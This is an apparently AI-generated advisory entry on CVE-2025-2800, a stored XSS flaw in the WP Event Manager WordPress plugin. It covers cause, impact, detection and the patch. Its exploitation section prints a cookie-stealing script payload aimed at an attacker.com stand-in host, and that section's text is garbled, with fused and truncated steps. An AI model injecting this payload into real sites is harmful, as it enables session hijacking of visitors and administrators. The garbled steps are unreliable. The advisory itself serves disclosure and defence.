
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-2800 is a Stored Cross-Site Scripting (XSS) vulnerability in the WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress. It affects all versions up to and including 3.1.50, with the fix introduced in version 3.1.51. The vulnerability was published on July 16, 2025, and was assigned by Wordfence. It carries a CVSS v3.1 base score of 6.1 (Medium) per NVD, though ENISA's EUVD rates it 7.2 (Wordfence, ENISA EUVD).
The root cause is insufficient input sanitization and output escaping of the organizer_name parameter (CWE-79: Improper Neutralization of Input During Web Page Generation). Because no authentication is required to submit this parameter, unauthenticated attackers can inject arbitrary JavaScript payloads that are stored server-side and rendered to any user who subsequently visits the affected page. The attack vector is network-based, requires no privileges, and only requires a victim to load the injected page to trigger script execution (Wordfence, ENISA EUVD).
Successful exploitation allows unauthenticated attackers to persistently inject malicious scripts into WordPress pages, which execute in the browsers of any user who visits the compromised page. Potential consequences include session cookie theft, credential harvesting via keylogging, redirection to malicious sites, and performing unauthorized actions within the WordPress site on behalf of authenticated victims (including administrators). While availability is not directly impacted, the integrity and confidentiality of user sessions and site content are at risk (Wordfence).
organizer_name parameter, e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.organizer_name value to the vulnerable endpoint.organizer_name field, the malicious script executes in their browser, enabling session hijacking, credential theft, or further attacks (Wordfence).organizer_name field.organizer_name parameter; unexpected admin-level actions in WordPress audit logs following user visits to event pages.<script>, javascript:, or encoded XSS payloads in the organizer_name field.The vendor released version 3.1.51 of the WP Event Manager plugin, which addresses the insufficient input sanitization and output escaping in the organizer_name parameter. Site administrators should update the plugin to version 3.1.51 or later immediately via the WordPress admin dashboard (WordPress Trac). As interim measures, deploying a Web Application Firewall (WAF) to filter XSS payloads and restricting public access to event submission forms can reduce exposure. Regularly auditing user-submitted content in the WordPress database for unexpected script tags is also recommended.
Wordfence reported the vulnerability as part of their weekly WordPress vulnerability report for the period of July 14–20, 2025, noting it as a stored XSS affecting unauthenticated users (Wordfence Blog). Qualys added a web application detection for this CVE in their July 2025 detection update (Qualys). No significant broader media coverage or notable researcher commentary beyond standard vulnerability tracking has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."